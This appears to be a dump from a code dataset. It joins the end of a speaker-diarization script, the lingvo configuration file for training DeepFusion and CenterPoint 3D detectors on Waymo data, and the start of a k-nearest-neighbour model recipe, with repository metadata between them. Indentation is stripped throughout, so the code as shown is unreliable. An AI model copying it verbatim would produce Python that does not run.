starts, ends, out_labels2 = merge_adjacent_labels(start, end, labels2nd)
output_rttm_dir = f'{args.out_rttm_dir}2nd'
mkdir_p(output_rttm_dir)
with open(os.path.join(output_rttm_dir, f'{file_name}.rttm'), 'w') as fp:
write_output(fp, out_labels2, starts, ends)
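# --- Editor's note: example invocation (all paths and values are illustrative) -
# python vbhmm.py --init AHC+VB --out-rttm-dir exp/rttm \
#     --xvec-ark-file exp/xvectors.ark --segments-file exp/segments \
#     --xvec-transform models/transform.h5 --plda-file models/plda \
#     --threshold -0.015 --lda-dim 128 --Fa 0.3 --Fb 17 --loopP 0.99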
|
017e16201515687d06c02b438c5b4e0d1f20d5d2
|
5c3296ff65e5a07852ff9dad1cc5e07991d08270
|
/lingvo/tasks/car/params/waymo_deepfusion.py
|
5aa56b6af524e852849e15f09028569d1542547c
|
[
"Apache-2.0"
] |
permissive
|
tensorflow/lingvo
|
dee164ef6e69edb352f2e855660b9b5227ddcf6f
|
c00a74b260fcf6ba11199cc4a340c127d6616479
|
refs/heads/master
| 2023-09-01T22:08:55.758781
| 2023-08-30T00:50:34
| 2023-08-30T00:51:26
| 142,219,189
| 2,963
| 485
|
Apache-2.0
| 2023-09-07T00:52:48
| 2018-07-24T22:30:28
|
Python
|
UTF-8
|
Python
| false
| false
| 32,044
|
py
|
waymo_deepfusion.py
|
# Copyright 2022 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Train deepfusion models on Waymo."""
import os
from lingvo import model_registry
from lingvo.core import activations
from lingvo.core import base_model_params
from lingvo.core import cluster_factory
from lingvo.core import hyperparams
from lingvo.core import optimizer
from lingvo.core import py_utils
from lingvo.tasks.car import deep_fusion
from lingvo.tasks.car import input_preprocessors
from lingvo.tasks.car import kitti_ap_metric
from lingvo.tasks.car import lr_util
from lingvo.tasks.car import pillars
from lingvo.tasks.car import pillars_anchor_free
from lingvo.tasks.car.params import waymo as waymo_params
from lingvo.tasks.car.waymo import waymo_decoder
from lingvo.tasks.car.waymo import waymo_metadata
from lingvo.tasks.car.waymo import waymo_open_input_generator
import numpy as np
# Set $WAYMO_DIR to the base path of where all the WAYMO files can be found.
_WAYMO_BASE = os.environ.get('WAYMO_DIR', 'FILL-ME-IN')
################## DeepFusion #############################
def _FilterKeepLabels(params, label_names):
"""Keep only label names in 'label_names' from input."""
metadata = waymo_metadata.WaymoMetadata()
filtered_labels = [
metadata.ClassNames().index(label_name) for label_name in label_names
]
params.extractors.labels.filter_labels = filtered_labels
def _NestedMapToParams(nmap):
p = hyperparams.Params()
for k, v in nmap.FlattenItems():
p.Define(k, v, '')
return p
def AddKITTIMetric(params):
"""Append the KITTI evaluation metrics to the list metrics run."""
p = params.Copy()
p.output_decoder.extra_ap_metrics = {
# We use the configuration for the Waymo dataset for evaluating
# with the KITTI evaluation code.
'kitti':
kitti_ap_metric.KITTIAPMetrics.Params(waymo_metadata.WaymoMetadata())
}
return p
def TrainerInputParams(train_params_fn):
"""Returns input params called under the context of a trainer.
Args:
train_params_fn: A callable that returns a Params() input object.
Returns:
An input params called in the context of a trainer.
"""
cluster = cluster_factory.Current()
train_cluster_p = cluster.params.Copy()
train_cluster_p.job = 'trainer_client'
train_cluster_p.mode = 'sync'
# When running a decoding only job, the job is configured so that there are no
# worker replicas.
#
# This prevents us from fetching the training parameters (an assert triggers
# if you try to fetch the training params with 0 workers), so we set worker
# replicas to 1 as a dummy value.
if train_cluster_p.worker.replicas <= 0:
train_cluster_p.worker.replicas = 1
with cluster_factory.Cluster(train_cluster_p):
train_input_p = train_params_fn()
return train_input_p
def AddPreprocessor(input_p,
name,
new_preprocessor_p,
insert_before=None,
insert_after=None):
"""Add a new preprocessor before an existing preprocessor.
Args:
input_p: The input params.
name: A string with the name of the new preprocessor.
new_preprocessor_p: The params of the new preprocessor.
insert_before: A string with which preprocessor to insert the new
preprocessor before. Defaults to None. Must specify either this or
`insert_after`.
insert_after: A string with which preprocessor to insert the new
preprocessor after. Defaults to None. Must specify either this or
`insert_before`.
Returns:
input_p: The input preprocessor with the new added preprocessor.
"""
if insert_before and insert_before not in input_p.preprocessors_order:
raise ValueError('`insert_before` preprocessor `{}` not found in '
'preprocessors_order.'.format(insert_before))
if insert_after and insert_after not in input_p.preprocessors_order:
raise ValueError('`insert_after` preprocessor `{}` not found in '
'preprocessors_order.'.format(insert_after))
if insert_before is None and insert_after is None:
raise ValueError('Must either specify `insert_before` or `insert_after`.')
if insert_before is not None and insert_after is not None:
raise ValueError('Please only provide `insert_before` or `insert_after` '
'not both.')
input_p.preprocessors.Define(name, new_preprocessor_p, '')
if insert_before:
insert_index = input_p.preprocessors_order.index(insert_before)
else:
insert_index = input_p.preprocessors_order.index(insert_after) + 1
input_p.preprocessors_order = (
input_p.preprocessors_order[:insert_index] + [name] +
input_p.preprocessors_order[insert_index:])
return input_p
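# Example (editor's note, with hypothetical preprocessor names): if
# input_p.preprocessors_order is ['points_to_grid', 'pad_lasers'], then
#   AddPreprocessor(input_p, 'random_flip',
#                   input_preprocessors.RandomFlipY.Params(),
#                   insert_before='pad_lasers')
# leaves the order as ['points_to_grid', 'random_flip', 'pad_lasers'].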
@model_registry.RegisterSingleTaskModel
class AnchorFreePillarsModelV1Base(base_model_params.SingleTaskModelParams):
"""Base model using point pillars featurization on a point cloud grid.
This is the base model; please refer to the specialized vehicle, pedestrian,
etc. models below to get an appropriate model to train.
"""
RUN_LOCALLY = 'BORG_TASK_HANDLE' not in os.environ
NUM_PILLARS = 16000
NUM_LASER_FEATURES = 3
ANGLE_BIN_NUM = 12
FRAME_OFFSETS = None
FRAME_DROPOUT_RATE = 0.
CAMERA_INPUT = False
GRID_SETTINGS = input_preprocessors.MakeGridSettings(
grid_x_range=(-85.00, 85.00),
grid_y_range=(-85.00, 85.00),
grid_z_range=(-3, 3),
grid_x=512,
grid_y=512,
grid_z=1)
TASK_CLS = pillars_anchor_free.AnchorFreePillarsBase
METADATA = waymo_metadata.WaymoMetadata()
CLASS_NAMES = METADATA.ClassNames()
NUM_CLASSES = len(CLASS_NAMES)
def _configure_input_single_frame(self, p, split):
p.file_datasource.file_pattern_prefix = _WAYMO_BASE
job_type = cluster_factory.Current().job
max_num_points = int(64 * 2560 * 1.5)
p.preprocessors = _NestedMapToParams(
py_utils.NestedMap(
filter_nlz_points=waymo_open_input_generator.FilterNLZPoints.Params(
),
filter_groundtruth=(
input_preprocessors.FilterGroundTruthByDifficulty.Params()),
viz_copy=input_preprocessors.CreateDecoderCopy.Params(),
points_to_grid=input_preprocessors.PointsToGrid.Params().Set(
normalize_td_labels=False),
grid_to_pillars=input_preprocessors.GridToPillars.Params().Set(
num_pillars=self.NUM_PILLARS),
grid_anchor_centers=input_preprocessors.GridAnchorCenters.Params(),
assign_points=input_preprocessors.PointAssignment.Params(
num_classes=self.NUM_CLASSES),
pad_lasers=input_preprocessors.PadLaserFeatures.Params().Set(
max_num_points=max_num_points),
))
p.preprocessors.viz_copy.pad_lasers.max_num_points = max_num_points
p.preprocessors_order = [
'filter_nlz_points',
'filter_groundtruth',
'viz_copy',
'points_to_grid',
'grid_to_pillars',
'grid_anchor_centers',
'assign_points',
'pad_lasers',
]
# Only train on LEVEL_1, and evaluate on LEVEL_2 or lower.
if job_type.startswith('trainer'):
p.preprocessors.filter_groundtruth.difficulty_threshold = 1
else:
p.preprocessors.filter_groundtruth.difficulty_threshold = 2
self.GRID_SETTINGS().UpdateGridParams(p.preprocessors.points_to_grid)
self.GRID_SETTINGS().UpdateAnchorGridParams(
p.preprocessors.grid_anchor_centers)
# If this is not the decoder job (e.g., this is trainer), do not
# count points and do not make visualization copies.
if job_type != 'decoder':
p.preprocessors_order.remove('viz_copy')
if job_type.startswith('trainer'):
p.batch_size = 2
else:
p.batch_size = 4
if self.RUN_LOCALLY:
p.num_batcher_threads = 1
p.file_buffer_size = 1
p.file_parallelism = 1
else:
p.num_batcher_threads = 16
p.file_buffer_size = 32
p.file_parallelism = 32
return p
def _configure_input(self, p, split):
if self.FRAME_OFFSETS:
raise NotImplementedError
else:
return self._configure_input_single_frame(p, split)
def Train(self):
p = waymo_open_input_generator.WaymoSparseLaser.Params()
p = waymo_params.WaymoTrainSpec(p)
p = self._configure_input(p, 'Train')
return p
def Minitrain(self):
p = self.Train()
p = waymo_params.WaymoMiniTrainSpec(p)
return p
def Test(self):
p = waymo_open_input_generator.WaymoSparseLaser.Params()
p = waymo_params.WaymoTestSpec(p)
p = self._configure_input(p, 'Test')
return p
def Dev(self):
p = waymo_open_input_generator.WaymoSparseLaser.Params()
p = waymo_params.WaymoValSpec(p)
p = self._configure_input(p, 'Dev')
return p
def Minidev(self):
p = self.Dev()
p = waymo_params.WaymoMinivalSpec(p)
return p
def Task(self):
# Number of classes can be fetched from input.
p = self.TASK_CLS.Params(
grid_size_z=self.GRID_SETTINGS().GRID_Z,
num_classes=self.NUM_CLASSES,
num_laser_features=self.NUM_LASER_FEATURES,
angle_bin_num=self.ANGLE_BIN_NUM)
p.name = 'anchor_free_point_pillars_waymo'
p.output_decoder = waymo_decoder.WaymoOpenDatasetDecoder.Params()
p.max_nms_boxes = 512
p.use_oriented_per_class_nms = True
# Note: Sub-classes need to set nms_iou_threshold and nms_score_threshold
# appropriately.
p.nms_iou_threshold = [0.0] * self.NUM_CLASSES
# TODO(jngiam): 1.1 for untrained classes is needed to avoid an issue
# with boxutils error.
p.nms_score_threshold = [1.1] * self.NUM_CLASSES
p.nms_iou_threshold[self.CLASS_NAMES.index('Vehicle')] = 0.5
p.nms_score_threshold[self.CLASS_NAMES.index('Vehicle')] = 0.05
ep = p.eval
# Train set uses a smaller decoding set, so we can
# safely eval over the entire input.
ep.samples_per_summary = 0
tp = p.train
tp.optimizer = optimizer.Adam.Params()
tp.clip_gradient_norm_to_value = 50
# To be tuned.
p.train.l2_regularizer_weight = 1e-4
# Adapted from V1 tuning.
tp.ema_decay = 0.99
# TODO(b/148537111): consider setting this to True.
tp.ema_decay_moving_vars = False
train_input_p = TrainerInputParams(self.Train)
# Get number of parallel processing cores for the worker.
# This is 8 for a 2x2 TPU, or 1 for a single GPU.
cluster = cluster_factory.Current()
total_num_cores = cluster.total_worker_devices
total_batch_size = train_input_p.batch_size * total_num_cores
# Set learning rate and schedule.
tp.learning_rate = 1e-4 * total_batch_size / 2
# Train for 75 epochs.
lr_util.SetExponentialLR(
train_p=tp,
train_input_p=train_input_p,
exp_start_epoch=5,
total_epoch=75)
return p
@model_registry.RegisterSingleTaskModel
class AnchorFreePillarsModelV1Ped(AnchorFreePillarsModelV1Base):
"""Pedestrian model w/ 512x512, 32k pillars, 1 stride in backbone."""
BLOCK0_STRIDE = 1
NUM_PILLARS = 32000
USE_BASIC_DATA_AUG = False
VALID_CLASS_NAMES = ['Pedestrian']
def _configure_input(self, p, split):
job_type = cluster_factory.Current().job
p = super()._configure_input(p, split)
if job_type.startswith('trainer') and self.USE_BASIC_DATA_AUG:
p.preprocessors.Define('global_loc_noise',
input_preprocessors.GlobalTranslateNoise.Params(),
'')
p.preprocessors.Define(
'rot_box',
input_preprocessors.RandomBBoxTransform.Params().Set(
max_rotation=np.pi / 20.), '')
p.preprocessors.Define('random_flip',
input_preprocessors.RandomFlipY.Params(), '')
p.preprocessors.Define(
'world_scaling',
(input_preprocessors.WorldScaling.Params().Set(scaling=[0.95, 1.05])),
'')
p.preprocessors_order = [
'rot_box', 'random_flip', 'world_scaling', 'global_loc_noise'
] + p.preprocessors_order
# Overwrites previous filtering. For multi frame model, this is already done
# when preparing the input (See ConfigurePillarsSquashedSequenceInputs).
if not self.FRAME_OFFSETS:
_FilterKeepLabels(p, self.VALID_CLASS_NAMES)
self.GRID_SETTINGS().UpdateAnchorGridParams(
p.preprocessors.grid_anchor_centers, output_stride=self.BLOCK0_STRIDE)
return p
def Task(self):
p = super().Task()
pillars_builder = pillars.Builder()
p.backbone = pillars_builder.Backbone(
odims=self.TASK_CLS.NUM_OUTPUT_CHANNELS,
down_strides=(self.BLOCK0_STRIDE, 2, 2))
# Initialize the class detector's bias term to be negative in line
# with focal losses paper (so predictions init as background).
p.class_detector = pillars_builder.Detector(
name='class',
idims=(3 * self.TASK_CLS.NUM_OUTPUT_CHANNELS),
odims=(p.grid_size_z * p.num_classes),
bias_params_init=py_utils.WeightInit.Constant(-4.595))
# Normalization hurts the training in some steps:
# pc_046 is without normalization, pc_047 is with.
p.loss_norm_type = pillars.LossNormType.NO_NORM
metadata = waymo_metadata.WaymoMetadata()
num_classes = len(metadata.ClassNames())
p.use_oriented_per_class_nms = True
p.max_nms_boxes = 512
p.nms_iou_threshold = [0.0] * num_classes
p.nms_iou_threshold[metadata.ClassNames().index('Pedestrian')] = 0.46
p.nms_score_threshold = [1.1] * num_classes
p.nms_score_threshold[metadata.ClassNames().index('Pedestrian')] = 0.01
p.per_class_loss_weight = [0.] * num_classes
p.per_class_loss_weight[metadata.ClassNames().index('Pedestrian')] = 1.0
# Add the KITTI evaluation metric to the Waymo Open Dataset in order to
# perform calibration analysis.
p = AddKITTIMetric(p)
return p
@model_registry.RegisterSingleTaskModel
class AnchorFreePillarsModelV1PedDV(AnchorFreePillarsModelV1Ped):
"""V1 Pedestrian with Dynamic voxelization."""
def _configure_input(self, p, split):
p = super()._configure_input(p, split)
if self.FRAME_OFFSETS:
assert 'points_to_grid' not in p.preprocessors_order
assert 'grid_to_pillars' not in p.preprocessors_order
else:
p.preprocessors_order.remove('points_to_grid')
p.preprocessors_order.remove('grid_to_pillars')
return p
def Task(self):
p = super().Task()
p.input_featurizer = pillars.DynamicVoxelizationFeaturizer.Params(
p.num_laser_features)
# Update input_featurizer settings by reference.
self.GRID_SETTINGS().UpdateGridParams(p.input_featurizer)
return p
@model_registry.RegisterSingleTaskModel
class AnchorFreePillarsModelV1PedAug(AnchorFreePillarsModelV1PedDV):
"""V1 Ped model w/ dynamic voxelization and aug.
highest L1 mAP: 65.9
"""
APPLY_DATA_AUG = True
def _configure_input(self, p, split):
p = super()._configure_input(p, split)
job_type = cluster_factory.Current().job
if job_type.startswith('trainer') and self.APPLY_DATA_AUG:
p = AddPreprocessor(
p,
'random_flip',
input_preprocessors.RandomFlipY.Params().Set(flip_probability=0.25),
insert_before='grid_anchor_centers')
p = AddPreprocessor(
p,
'global_rot',
input_preprocessors.RandomWorldRotationAboutZAxis.Params().Set(
max_rotation=np.pi / 4.),
insert_before='grid_anchor_centers')
return p
def Task(self):
p = super().Task()
p.output_decoder.ap_metric.waymo_breakdown_metrics = ['RANGE', 'VELOCITY']
return p
@model_registry.RegisterSingleTaskModel
class AnchorFreePillarsModelV1PedCenterNess(AnchorFreePillarsModelV1PedAug):
"""Add center-ness loss in the pedestrian model.
highest L1 mAP: 69.5
"""
def _configure_input(self, p, split):
p = super()._configure_input(p, split)
job_type = cluster_factory.Current().job
if job_type.startswith('trainer'):
p.preprocessors.assign_points.extra_label_range = [0.0, 1.0]
return p
def Task(self):
p = super().Task()
p.centerness_loss_weight = 1.0
return p
@model_registry.RegisterSingleTaskModel
class AnchorFreePillarsModelV1PedCenterNessRelated(
AnchorFreePillarsModelV1PedCenterNess):
"""Times center-ness label with regression mask.
That is, if a pillar has higher center-ness label, it will also have higher
regression loss weight.
highest L1 mAP: 71
"""
def _configure_input(self, p, split):
p = super()._configure_input(p, split)
job_type = cluster_factory.Current().job
if job_type.startswith('trainer'):
# Use center-ness label to reweight regression loss.
p.preprocessors.assign_points.extra_label_related_reg_mask = True
return p
@model_registry.RegisterSingleTaskModel
class AnchorFreePillarsModelV1VehicleCenterNess(
AnchorFreePillarsModelV1PedCenterNessRelated):
"""This is the model of refactoring anchor-free pillars.
highest L1 mAP: 65.22
"""
GRID_SETTINGS = input_preprocessors.MakeGridSettings(
grid_x_range=(-76.8, 76.8),
grid_y_range=(-76.8, 76.8),
grid_z_range=(-3, 3),
grid_x=512,
grid_y=512,
grid_z=1)
VALID_CLASS_NAMES = ['Vehicle']
def Task(self):
p = super().Task()
metadata = waymo_metadata.WaymoMetadata()
class_names = metadata.ClassNames()
num_classes = len(class_names)
p.nms_iou_threshold = [0.0] * num_classes
p.nms_score_threshold = [1.1] * num_classes
p.per_class_loss_weight = [0.] * num_classes
p.nms_iou_threshold[class_names.index('Vehicle')] = 0.2
p.nms_score_threshold[class_names.index('Vehicle')] = 0.001
p.per_class_loss_weight[metadata.ClassNames().index('Vehicle')] = 1.0
p.max_nms_boxes = 256
p.train.l2_regularizer_weight = 0.0
p.centerness_loss_weight = 0.0
return p
@model_registry.RegisterSingleTaskModel
class CenterPointImprovedVehicle(AnchorFreePillarsModelV1VehicleCenterNess):
"""CenterPoint Vehicle model with improved implementation.
The following parameters are tuned to achieve better performance: NMS
parameters, weight decay, gradient clipping, data augmentation, training
schedule, activation function, featurizer, backbone channels, EMA, and
training with LEVEL_2 difficulty data.
highest L1 mAP: 76.45
"""
VALID_CLASS_NAMES = ['Vehicle']
NMS_IOU_THRESHOLD = 0.8
NMS_SCORE_THRESHOLD = 0.01
L2_REGULARIZER_WEIGHT = 0
PER_CLASS_LOSS_WEIGHT = 1.0
CLIP_GRADIENT_NORM_TO_VALUE = 5
APPLY_DATA_AUG = False
APPLY_STRONG_DATA_AUG = True
MAX_ROTATION = 3.14159
EPOCH = 60
WARM_UP_EPOCH = 3
LEARN_RATE = 3e-4
NUM_OUTPUT_FEATURES = 256
MLP_DIMS = [256, 256, 512]
ACTIVATION = 'SWISH'
def _apply_strong_data_aug(self, p, insert_before='grid_anchor_centers'):
"""Apply strong data augmentations to an input params."""
# Global Rotation.
p = AddPreprocessor(
p,
'random_apply_global_rot',
input_preprocessors.RandomApplyPreprocessor.Params().Set(
prob=0.74,
choice_save_prefix='inverse_aug.global_rot',
subprocessor=(
input_preprocessors.RandomWorldRotationAboutZAxis.Params().Set(
max_rotation=0.41,
include_world_rot_z=False,
rot_save_key='inverse_aug.global_rot.rot'))),
insert_before=insert_before)
# World Scaling.
p = AddPreprocessor(
p,
'world_scaling',
input_preprocessors.WorldScaling.Params().Set(
scaling_save_key='inverse_aug.world_scaling.scaling',
scaling=[0.95, 1.05]),
insert_before=insert_before)
# Global Translation.
p = AddPreprocessor(
p,
'global_loc_noise',
input_preprocessors.GlobalTranslateNoise.Params().Set(
noise_save_key='inverse_aug.global_loc_noise.noise',
noise_std=[0., 0., 0.35]),
insert_before=insert_before)
# Random Flip.
p = AddPreprocessor(
p,
'random_flip',
input_preprocessors.RandomFlipY.Params().Set(
flip_save_key='inverse_aug.random_flip.flip', flip_probability=0.5),
insert_before=insert_before)
# Frustum Dropout.
p = AddPreprocessor(
p,
'random_apply_frustum_dropout',
input_preprocessors.RandomApplyPreprocessor.Params().Set(
prob=0.3575,
subprocessor=(input_preprocessors.FrustumDropout.Params().Set(
theta_width=0.08,
phi_width=1.07,
distance=9.46,
drop_type='union',
keep_prob=0.44))),
insert_before=insert_before)
# Frustum Noise.
p = AddPreprocessor(
p,
'random_apply_frustum_noise',
input_preprocessors.FrustumNoise.Params().Set(
theta_width=0.03, phi_width=0.0),
insert_before=insert_before)
# Random Dropout.
p = AddPreprocessor(
p,
'random_apply_random_dropout',
input_preprocessors.RandomDropLaserPoints.Params(),
insert_before=insert_before)
return p
def _configure_input(self, p, split):
p = super()._configure_input(p, split)
# change batch size to 1 for comparing with MultiModal Models.
p.batch_size = 1
# set training data
job_type = cluster_factory.Current().job
if job_type.startswith('trainer') and self.APPLY_STRONG_DATA_AUG:
assert not self.APPLY_DATA_AUG
p = self._apply_strong_data_aug(p)
p.preprocessors.random_apply_global_rot.subprocessor.max_rotation = self.MAX_ROTATION
p.preprocessors.filter_groundtruth.difficulty_threshold = 2
return p
def Task(self):
p = super().Task()
# Set class specific parameters (nms, loss weight, l2 loss, gradient clip).
metadata = waymo_metadata.WaymoMetadata()
class_names = metadata.ClassNames()
num_classes = len(class_names)
nms_iou_threshold = self.NMS_IOU_THRESHOLD if isinstance(
self.NMS_IOU_THRESHOLD,
list) else [self.NMS_IOU_THRESHOLD] * len(self.VALID_CLASS_NAMES)
nms_score_threshold = self.NMS_SCORE_THRESHOLD if isinstance(
self.NMS_SCORE_THRESHOLD,
list) else [self.NMS_SCORE_THRESHOLD] * len(self.VALID_CLASS_NAMES)
per_class_loss_weight = self.PER_CLASS_LOSS_WEIGHT if isinstance(
self.PER_CLASS_LOSS_WEIGHT,
list) else [self.PER_CLASS_LOSS_WEIGHT] * len(self.VALID_CLASS_NAMES)
p.nms_iou_threshold = [0.0] * num_classes
p.nms_score_threshold = [1.1] * num_classes
p.per_class_loss_weight = [0.] * num_classes
for class_idx, class_name in enumerate(self.VALID_CLASS_NAMES):
p.nms_iou_threshold[class_names.index(
class_name)] = nms_iou_threshold[class_idx]
p.nms_score_threshold[class_names.index(
class_name)] = nms_score_threshold[class_idx]
p.per_class_loss_weight[metadata.ClassNames().index(
class_name)] = per_class_loss_weight[class_idx]
p.train.l2_regularizer_weight = self.L2_REGULARIZER_WEIGHT
if self.CLIP_GRADIENT_NORM_TO_VALUE:
tp = p.train
tp.clip_gradient_norm_to_value = self.CLIP_GRADIENT_NORM_TO_VALUE
# Set architecture.
pillars_builder = pillars.Builder()
pillars_builder.activation_fn = activations.GetFn(self.ACTIVATION)
point_encoder = p.input_featurizer.point_encoder.Instantiate()
encoding_size = point_encoder.NumEncodingFeatures(p.num_laser_features)
p.input_featurizer.featurizer = pillars_builder.MLPFeaturizer(
'feat', [encoding_size] + self.MLP_DIMS + [self.NUM_OUTPUT_FEATURES],
activation_fn=self.ACTIVATION)
backbone_channel_multiplier = self.NUM_OUTPUT_FEATURES // 64
p.backbone = pillars_builder.Backbone(
odims=self.TASK_CLS.NUM_OUTPUT_CHANNELS,
down_strides=(self.BLOCK0_STRIDE, 2, 2),
channel_multiplier=backbone_channel_multiplier,
activation=self.ACTIVATION)
# Get number of parallel processing cores for the worker.
# This is 8 for a 2x2 TPU, or 1 for a single GPU.
tp = p.train
train_input_p = TrainerInputParams(self.Train)
cluster = cluster_factory.Current()
total_num_cores = cluster.total_worker_devices
total_batch_size = train_input_p.batch_size * total_num_cores
# Set learning rate and schedule.
tp.learning_rate = self.LEARN_RATE * total_batch_size / 2
# TODO(ywli): currently the warmup phase is linear rampup,
# but in DeepFusion, Cosine Rampup is used.
# see function SetOneCycleLR from cl/419866459
# lingvo/tasks/car/lr_util.py
lr_util.SetCosineLR(
train_p=tp,
train_input_p=train_input_p,
total_epoch=self.EPOCH,
warmup_epoch=self.WARM_UP_EPOCH,
warmup_init=0.1)
# Set EMA parameters.
tp = p.train
tp.ema_decay = 0.9999
tp.ema_decay_moving_vars = True
return p
@model_registry.RegisterSingleTaskModel
class CenterPointImprovedPedestrian(CenterPointImprovedVehicle):
"""CenterPoint Pedestrian model with improved implementation.
The following parameters are tuned to achieve better performance: NMS parameters,
weight decay, gradient clipping, data augmentation, training schedule, activation
function, featurizer, backbone channels, EMA, and training with LEVEL_2
difficulty data.
Highest L1 mAP: 80.36
"""
MAX_ROTATION = 2.0944
NMS_IOU_THRESHOLD = 0.3
VALID_CLASS_NAMES = ['Pedestrian']
L2_REGULARIZER_WEIGHT = 1e-4
CLIP_GRADIENT_NORM_TO_VALUE = 50
@model_registry.RegisterSingleTaskModel
class UncertaintyCenterPointPed(CenterPointImprovedPedestrian):
"""CenterPoint Pedestrian model with uncertainty loss.
The uncertainty (from https://arxiv.org/abs/1910.11375) is applied to the
location loss and dimensions loss.
Highest L1 mAP: 81.49
"""
def Task(self):
p = super().Task()
p.location_loss = pillars_anchor_free.LaplaceKL.Params().Set()
p.dimensions_loss = pillars_anchor_free.LaplaceKL.Params().Set(
targets_scale=0.001)
p.dimensions_loss_weight = 0.3
pillars_builder = pillars.Builder()
p.regression_detector = pillars_builder.Detector(
name='reg',
idims=(3 * self.TASK_CLS.NUM_OUTPUT_CHANNELS),
odims=(p.grid_size_z *
(3 * p.location_loss.num_params_per_prediction +
3 * p.dimensions_loss.num_params_per_prediction +
p.angle_bin_num + p.angle_bin_num)),
conv_init_method=py_utils.WeightInit.Constant(0.0))
return p
@model_registry.RegisterSingleTaskModel
class DeepFusionCenterPointPed(UncertaintyCenterPointPed):
"""DeepFusion CenterPoint Pedstrain Model.
A late-stage deep feature level fusion, with InverseAug and LearnableAlign, to
improve the quality of alignment among multimodal features. For more details,
see https://arxiv.org/pdf/2203.08195.pdf.
"""
CAMERA_INPUT = True
def _apply_inverse_aug(self, p, insert_after='create_cell_center_xyz'):
"""Apply inverse augmentations to an input params."""
# Random Flip.
p = AddPreprocessor(
p,
'inverse_random_flip',
input_preprocessors.InverseRandomFlipY.Params().Set(
flip_save_key='inverse_aug.random_flip.flip',
points_keys=['cell_center_xyz']),
insert_after=insert_after)
# Global Translation.
p = AddPreprocessor(
p,
'inverse_global_loc_noise',
input_preprocessors.InverseGlobalTranslateNoise.Params().Set(
noise_save_key='inverse_aug.global_loc_noise.noise',
points_keys=['cell_center_xyz']),
insert_after='inverse_random_flip')
# World Scaling.
p = AddPreprocessor(
p,
'inverse_world_scaling',
input_preprocessors.InverseWorldScaling.Params().Set(
scaling_save_key='inverse_aug.world_scaling.scaling',
points_keys=['cell_center_xyz']),
insert_after='inverse_global_loc_noise')
# Global Rotation.
p = AddPreprocessor(
p,
'inverse_random_apply_global_rot',
input_preprocessors.InverseRandomApplyPreprocessor.Params().Set(
choice_save_prefix='inverse_aug.global_rot',
subprocessor=(input_preprocessors
.InverseRandomWorldRotationAboutZAxis.Params().Set(
rot_save_key='inverse_aug.global_rot.rot',
points_keys=['cell_center_xyz']))),
insert_after='inverse_world_scaling')
# Check if the order of InverseAug is correct.
assert (p.preprocessors_order.index('random_apply_global_rot') <
p.preprocessors_order.index('world_scaling'))
assert (p.preprocessors_order.index('world_scaling') <
p.preprocessors_order.index('global_loc_noise'))
assert (p.preprocessors_order.index('global_loc_noise') <
p.preprocessors_order.index('random_flip'))
return p
def _configure_input(self, p, split):
p = super()._configure_input(p, split)
if not self.FRAME_OFFSETS:
# Add images when it is a single-frame model.
# When it is a multi-frame model, the images are automatically added when
# setting CAMERA_INPUT = True.
assert self.CAMERA_INPUT
p.extractors.Define(
'images', waymo_open_input_generator.WaymoImageExtractor.Params(), '')
p.preprocessors.Define(
'create_cell_center_xyz',
input_preprocessors.CopyFeatures.Params().Set(
source_key='lasers.points_xyz', target_key='cell_center_xyz'), '')
p.preprocessors.Define(
'cell_center_to_camera',
waymo_open_input_generator.CellCenterToBestCamera.Params().Set(
camera_names=[]), '')
p.preprocessors.Define(
'resize_images',
waymo_open_input_generator.RescaleResizeImages.Params().Set(
rescale=True,
resize_ratio=0.3125,
projected_points_keys=[
'cell_center_projected.points_in_best_camera'
]), '')
p.preprocessors_order += [
'create_cell_center_xyz', 'cell_center_to_camera', 'resize_images'
]
job_type = cluster_factory.Current().job
if job_type.startswith('trainer') and self.APPLY_STRONG_DATA_AUG:
p = self._apply_inverse_aug(p)
return p
def Task(self):
p = super().Task()
image_builder = deep_fusion.ImageFeatureExtractorBuilder()
learnable_align_builder = deep_fusion.LearnableAlignBuilder(
lidar_channels=self.NUM_OUTPUT_FEATURES)
assert p.input_featurizer.cls == pillars.DynamicVoxelizationFeaturizer
p.input_featurizer.Set(return_dynamic_voxels=True)
p.input_featurizer = deep_fusion.MultiModalFeaturizer.Params().Set(
pointcloud_featurizer=p.input_featurizer,
image_featurizer=image_builder.ImageFeatureExtractor('image_tower'),
fusion=learnable_align_builder.Fusion('fusion'),
camera_feature_aligner=deep_fusion.DeepFusionAligner.Params().Set(
q_embedding=learnable_align_builder.LidarEmbedding('q_embedding'),
k_embedding=learnable_align_builder.ImageEmbedding('k_embedding'),
v_embedding=learnable_align_builder.ImageEmbedding('v_embedding'),
attn_dropout=learnable_align_builder.Dropout('attn_dropout'),
learnable_align_fc=learnable_align_builder.FC('learnable_align_fc'),
))
return p
# ===== /models/algorithms/knearestneighbour.py (repo: h2oai/driverlessai-recipes, license: Apache-2.0) =====
"""K-Nearest Neighbor implementation by sklearn. For small data (< 200k rows)."""
import os
import datatable as dt
import numpy as np
import pandas as pd
from h2oaicore.models_main import MainModel
from h2oaicore.systemutils import config, physical_cores_count, loggerinfo
from sklearn.preprocessing import LabelEncoder
from h2oaicore.models import CustomModel
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import KNeighborsRegressor, KNeighborsClassifier
class KNearestNeighbourModel(CustomModel):
_regression = True
_binary = True
_multiclass = True
_parallel_task = True
_testing_can_skip_failure = False # ensure tested as if shouldn't fail
_display_name = "KNearestNeighbour"
_description = "K Nearest Neighbour Model based on sklearn. Not adviced if the data is larger than 200K rows"
@staticmethod
def can_use(accuracy, interpretability, train_shape=None, test_shape=None, valid_shape=None, n_gpus=0,
num_classes=None, **kwargs):
if config.hard_asserts:
# for bigger data, too slow to test even with 1 iteration
use = train_shape is not None and train_shape[0] * train_shape[1] < 1024 * 1024 or \
valid_shape is not None and valid_shape[0] * valid_shape[1] < 1024 * 1024
# too slow for walmart with only 421k x 15 even with 10 neighbors
use &= train_shape is not None and train_shape[1] < 10
return use
else:
return True
def set_default_params(self, accuracy=None, time_tolerance=None, interpretability=None, **kwargs):
kwargs.pop('get_best', None)
self.mutate_params(accuracy=accuracy, time_tolerance=time_tolerance, interpretability=interpretability,
get_best=True, **kwargs)
